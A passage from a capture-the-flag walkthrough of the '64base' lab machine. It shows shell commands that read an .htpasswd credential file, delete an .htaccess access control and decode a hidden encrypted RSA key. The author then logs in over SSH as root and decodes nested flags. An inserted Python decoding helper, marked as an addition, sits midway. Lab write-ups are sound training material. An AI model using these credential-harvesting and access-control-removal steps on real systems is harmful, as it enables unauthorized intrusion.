  458. 4.0K -rwxr-xr-x 1 www-data www-data 139 Nov 30 07:02 index.php
  459. www-data@64base:~/html/admin$ cat .htaccess
  460. cat .htaccess
  461. AuthUserFile /usr/share/apache2/.htpasswd2
  462. AuthName "Authorization Required"
  463. AuthType Basic
  464. require valid-user
  465.  
  466. rm .htaccess (because I can)
  467.  
  468. www-data@64base:~/html/admin$ cat index.php
  469. cat index.php
  470. <!DOCTYPE html>
  471. <html lang="en">
  472. <title>64base - login</title>
  473. <h3>[☠] ERROR: incorrect path!</h3>
  474. <!-- don't forget the login login -->
  475. www-data@64base:~/html/admin$
  476.  
  477. www-data@64base:~/html/admin$ cat /usr/share/apache2/.htpasswd2
  478. cat /usr/share/apache2/.htpasswd2
  479. trolololllololllooloo
  480. www-data@64base:~/html/admin$
  481.  
  482. echo TG9vayBJbnNpZGUhIDpECg== | base64 -d
  483. Look Inside! :D
  484.  
  485. Look inside /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
  486.  
  487. hex:
  489.  
  490. hex again:
  518.  
  519. root@kali:~/ctf/x64# cat hex.txt | xxd -r -p
  551.  
  552. cat hex.txt | base64 -d -i
  553. -----BEGIN RSA PRIVATE KEY-----
  554. Proc-Type: 4,ENCRYPTED
  555. DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C
  556.  
  582. -----END RSA PRIVATE KEY-----
  583.  
  584. Saved the output to 64baseprivate.key
  585.  
  586. ssh -i 64baseprivate.key root@192.168.1.76 -p62964
  587.  
  588. Enter passphrase for key '64baseprivate.key':
  589.  
  590. Looking at the image that was in "./admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}", it's Luke saying "use the force".
  591. The passphrase for the key is "usetheforce", which logs in as root.
  592.  
  593. Last login: Tue Dec 6 05:40:07 2016 from 172.16.0.18
  594.  
  595. flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
  596. root@64base:~#
  597.  
  598. root@64base:~# ls -lash
  599. total 32K
  600. 4.0K drwx------ 3 root root 4.0K Dec 6 05:40 .
  601. 4.0K drwxr-xr-x 22 root root 4.0K Dec 6 03:00 ..
  602. 0 -rw------- 1 root root 0 Apr 9 00:00 .bash_history
  603. 4.0K -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
  604. 4.0K -rw-r--r-- 1 root root 592 Dec 6 00:13 .profile
  605. 4.0K -rw-r--r-- 1 root root 66 Dec 5 12:53 .selected_editor
  606. 4.0K drwx------ 2 root root 4.0K Nov 30 08:11 .ssh
  607. 4.0K -rw-r--r-- 1 root root 50 Dec 6 00:19 story
  608. 4.0K -rw------- 1 root root 52 Dec 6 05:40 .Xauthority
  609. root@64base:~# cat story
  610. https://asciinema.org/a/bmm6115k884o4ix0c7u38ylet
  611. root@64base:~#
  612.  
  613.  
  614. root@64base:~# base64
  615. ^C
  616. root@64base:~# echo NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK | base64 -d
  617. 4e546b325a4451324e324531595455304e546b7a4d4451354e444d7a4d545a694e446b304d7a4d354d7a49314f5455344e446b334e6a59794e44637a4f545a684e546b314e7a63334e7a5930597a5a6b4e7a677a4d5459784d7a49314e6a4d344e6a49304e7a55324e3245324d7a63354d7a55334f5456684e5463304e6a637a4e444d324e7a4e6b4d32517759516f3d0a
  618. root@64base:~# echo 4e546b325a4451324e324531595455304e546b7a4d4451354e444d7a4d545a694e446b304d7a4d354d7a49314f5455344e446b334e6a59794e44637a4f545a684e546b314e7a63334e7a5930597a5a6b4e7a677a4d5459784d7a49314e6a4d344e6a49304e7a55324e3245324d7a63354d7a55334f5456684e5463304e6a637a4e444d324e7a4e6b4d32517759516f3d0a | xxd -r -p
  619. NTk2ZDQ2N2E1YTU0NTkzMDQ5NDMzMTZiNDk0MzM5MzI1OTU4NDk3NjYyNDczOTZhNTk1Nzc3NzY0YzZkNzgzMTYxMzI1NjM4NjI0NzU2N2E2Mzc5MzU3OTVhNTc0NjczNDM2NzNkM2QwYQo=
  620. root@64base:~# echo NTk2ZDQ2N2E1YTU0NTkzMDQ5NDMzMTZiNDk0MzM5MzI1OTU4NDk3NjYyNDczOTZhNTk1Nzc3NzY0YzZkNzgzMTYxMzI1NjM4NjI0NzU2N2E2Mzc5MzU3OTVhNTc0NjczNDM2NzNkM2QwYQo= | base64 -d
  621. 596d467a5a5459304943316b49433932595849766247396a595777764c6d7831613256386247567a637935795a57467343673d3d0a
  622. root@64base:~# echo 596d467a5a5459304943316b49433932595849766247396a595777764c6d7831613256386247567a637935795a57467343673d3d0a | xxd -r -p
  623. YmFzZTY0IC1kIC92YXIvbG9jYWwvLmx1a2V8bGVzcy5yZWFsCg==
  624. root@64base:~# echo YmFzZTY0IC1kIC92YXIvbG9jYWwvLmx1a2V8bGVzcy5yZWFsCg== | base64 -d
  625. base64 -d /var/local/.luke|less.real
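
The flag6 decoding above alternates `base64 -d` and `xxd -r -p` by hand until a readable command appears. As an added example (not part of the original walkthrough), this Python sketch automates that peeling, the same way an analyst would unwrap a layered-encoded string found in a log or script. `decode_once`, `peel`, `wrap` and the sample plaintext are constructed for this example; PAGE_HEX is the last hex string from the session above.

```python
import base64
import binascii
import re
import string

HEX_RE = re.compile(r"[0-9a-fA-F]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
PRINTABLE = set(string.printable.encode())
# Copied from the walkthrough: the last hex string fed to `xxd -r -p`.
PAGE_HEX = ("596d467a5a5459304943316b49433932595849766247396a595777764c6d7831"
            "613256386247567a637935795a57467343673d3d0a")


def decode_once(text):
    """Return (layer, bytes) if text is strictly hex or base64, else None."""
    # Hex is tested first because every hex digit is also a base64 character.
    if len(text) % 2 == 0 and HEX_RE.fullmatch(text):
        return "hex", binascii.unhexlify(text)
    if len(text) % 4 == 0 and B64_RE.fullmatch(text):
        try:
            return "base64", base64.b64decode(text, validate=True)
        except binascii.Error:
            return None
    return None


def peel(blob, max_layers=16):
    """Strip hex/base64 layers; return (innermost text, layer names in order)."""
    text, layers = blob.strip(), []
    while len(layers) < max_layers:
        step = decode_once(text)
        # Stop when nothing decodes, or the result is empty or not printable
        # ASCII: the current text is then the payload, not another layer.
        if step is None or not step[1] or not set(step[1]) <= PRINTABLE:
            break
        layers.append(step[0])
        text = step[1].decode("ascii").strip()
    return text, layers


def wrap(plaintext, rounds):
    """Constructed sample: base64 then hex per round, newline-terminated like `echo`."""
    data = plaintext.encode()
    for _ in range(rounds):
        data = binascii.hexlify(base64.b64encode(data + b"\n") + b"\n")
    return data.decode()


if __name__ == "__main__":
    print(peel(PAGE_HEX))
```

The stop rule is a heuristic: a payload that is itself valid hex or base64 and decodes to printable text would be peeled one layer too far, so check the reported layer list against what you expect.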
  626.  
  627.  
  628. __ __ _ _ _____
  629. \ \ / / | | | | __ \
  630. \ \ /\ / /__| | | | | | | ___ _ __ ___
  631. \ \/ \/ / _ \ | | | | | |/ _ \| '_ \ / _ \
  632. \ /\ / __/ | | | |__| | (_) | | | | __/
  633. __ \/ _\/ \___|_|_|_|_____/ \___/|_|_|_|\___| _
  634. \ \ / / | __ \(_) | | |_ _| | | |
  635. \ \_/ /__ _ _ | | | |_ __| | | | | |_| |
  636. \ / _ \| | | | | | | | |/ _` | | | | __| |
  637. | | (_) | |_| | | |__| | | (_| | _| |_| |_|_|
  638. |_|\___/ \__,_| |_____/|_|\__,_| |_____|\__(_)
  639.  
  640. _____ _ _ _ __ __ __ _ ___ _ __ ___ __ __ __ _ ___ _ _ __ _________
  641. %=x%= | |V| |_)|_ |_) | |_| | |_) |_| (_ |_ |_) | |_| |\| (_ %=x%=x%=x
  642. ~~~~~ | | | | |_ | \ | | | |_ |_) | | __) |_ | |_ | | | | __) ~~~~~~~~~
  643. LS
  644. .-. .-.
  645. .=========. E x t e r i o r , A e r i a l V i e w
  646. ||.-.7.-.|| -----------------------------------------
  647. ||`-' `-'||
  648. `========='
  649. `-'| |`-'8 1 .............. Sensor Suite Tower
  650. ______ |9| ______ 2 ... Heavy Twin Turbolaser Turrets
  651. / /\__| |__/\ \ 3 ............. Heavy Laser Turrets
  652. / \_ / / |_| \ \ _/ \ 4 ....... TIE Fighter Launch Chutes
  653. /___(\\\/ \///)___\ 5 ............... Heavy Blast Doors
  654. \____\\`==========='//____/ 6 .................... Guard towers
  655. / '/ .-------. \\ \ 7 ........ Shuttle Landing Platform
  656. __/ //. \`+---+'/ .\\ \__ 8 ........... AT-AT Docking Station
  657. /\ \ ///x`.\|___|/.'x\\\ / /\ 9 ................. Connecting Ramp
  658. / \ \ //`-._//| |\\_.2'\\ / / \
  659. / _.-==='_____//.-=-.\\_____`===-._ \
  660. \ `-===.\-. \ `-=1' / .-/.===-' 3 / The pre-fabricated, multi-function
  661. \ / / \\\ \ \.===./ /4/// \ \ / Imperial garrison base is the back-
  662. \/_/ \\\ | /.---.\ | /// \_\/ bone of the Empire's occupational
  663. \ \\\|/ |_m_| \|/// / forces. These heavily-armoured for-
  664. \_____\=============/_____/ tresses have walls up to 10 meters
  665. /____/// ___ \\\____\ thick to guard against ground
  666. \ (_//\__|||||__/\\_) / assaults, and powerful deflector
  667. \ / \|,,|||||,,|/ \ / shields protect them for air or
  668. \_____| | 5 | 6|_____/ space attacks.
  669. `--' `--'
  670. ____________________________________________________________________________
  671. %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
  672. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  673.  
  674. Hopefully I didn't leave anything out. I tried a lot of things after flag 5, not realizing the flag's string was the file name of an image.
  675.  
  676. - DigiP